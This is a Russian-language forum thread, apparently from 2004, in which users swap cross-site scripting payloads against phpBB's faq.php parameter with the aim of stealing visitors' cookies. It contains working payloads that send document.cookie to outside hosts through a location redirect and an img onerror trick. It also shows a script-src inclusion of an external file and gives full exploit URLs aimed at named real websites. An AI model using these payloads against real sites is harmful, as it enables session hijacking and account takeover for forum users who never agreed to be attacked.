Просмотр полной версии : Кто рубит в xss!
Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script>document.location="www.asd.as/as.php?xack="+document.cookie</script>, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script>document.location&#61& #34www.asd.as/as.php?xack&#61&#34&#43document.cookie</script>, то строка выполняется только до "<script>document.location=" и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?
Вот так:
http://www.[target].ty/faq.php....1]=test (http://www.[target].ty/faq.php?faq[0][0]=te<script>alert(document.cookie);</script>st&faq[0][1]=test)
Вот так работает
http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&faq[0][1]=test
а в каких версиях PHPbb это работает?
вот тут: www.rimspb.ru/forum/ например не пашет...
в разных...
http://forum.jamer.net/faq.php....]=Pengo (http://forum.jamer.net/faq.php?mode=bbcode&faq[0][0]=Pengo<script>alert(document.cookie);</script>%20Hacker&faq[0][1]=Pengo)
PEPSICOLA
25.11.2004, 13:57
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
А при чём тут он?????? :confused: :D
PEPSICOLA
26.11.2004, 03:04
Мне его так не хватает... :( ... :D
TaskFall
24.12.2004, 16:32
Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot